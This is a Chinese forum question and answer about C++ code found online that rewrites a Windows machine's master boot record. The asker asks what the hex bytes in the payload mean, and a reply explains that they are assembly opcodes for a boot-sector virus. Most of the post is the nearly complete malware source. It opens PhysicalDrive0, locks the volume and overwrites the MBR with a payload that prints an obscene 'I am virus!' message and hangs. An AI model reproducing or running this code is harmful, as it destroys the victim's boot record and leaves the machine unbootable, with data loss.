這些是網(wǎng)上修改MBR的C++代碼,請問那些“0x幾幾”的16進制代碼有什么含義,?是ASCII嗎,?
#include <windows.h>#include <winioctl.h>unsigned char scode[] ="xb8x12x00xcdx10xbdx18x7cxb9x18x00xb8x01x13xbbx0c""x00xbax1dx0excdx10xe2xfex49x20x61x6dx20x76x69x72""x75x73x21x20x46x75x63x6bx20x79x6fx75x20x3ax2dx29";/*00000000 B81200 mov ax, 12H ; ah = 0, al = 12h (640 * 480)00000003 CD10 int 10h ; 進入圖形顯示方式,隱藏光標00000005 BD187C mov bp, Msg ; ES:BP = 串地址00000008 B91800 mov cx, 18h ; CX = 串長度0000000B B80113 mov ax, 1301h ; AH = 13, AL = 01h0000000E BB0C00 mov bx, 000ch ; 頁號為0(BH = 0) 黑底紅字(BL = 0Ch,高亮)00000011 BA1D0E mov dx, 0e1dh ; dh行, dl列00000014 CD10 int 10h ; 10h 號中斷00000016 E2FE loop $Msg: db "I am virus! Fuck you :-)" 這些和上面的十六進制字符有什么關(guān)系*/int WINAPI WinMain( HINSTANCE hInstance, // handle to current instance HINSTANCE hPrevInstance, // handle to previous instance LPSTR lpCmdLine, // pointer to command line int nCmdShow // show state of window){HANDLE hDevice;Dword dwBytesWritten, dwBytesReturned;BYTE pMBR[512] = {0};// 重新構(gòu)造MBRmemcpy(pMBR, scode, sizeof(scode) - 1);pMBR[510] = 0x55;pMBR[511] = 0xAA;hDevice = CreateFile(".PHYSICALDRIVE0",GENERIC_READ | GENERIC_WRITE,FILE_SHARE_READ | FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL);if (hDevice == INVALID_HANDLE_VALUE) return -1;DeviceIoControl(hDevice,FSCTL_LOCK_VOLUME,NULL,0,NULL,0,&dwBytesReturned,NULL);// 寫入病毒內(nèi)容WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);DeviceIoControl(hDevice,FSCTL_UNLOCK_VOLUME,NULL,0,NULL,0,&dwBytesReturned,NULL);CloseHandle(hDevice);return 0;}
你的注釋中很明顯的告訴你了,,scode[] ="xb8x12x00xcdx10xbdx18....
這些是匯編的指令代碼,對應(yīng)的就是
00000000B81200 mov ax, 12H ; ah = 0, al = 12h (640 * 480)
,。,。。
這個屬于引導(dǎo)型病毒,,它要求編程者有匯編基礎(chǔ)的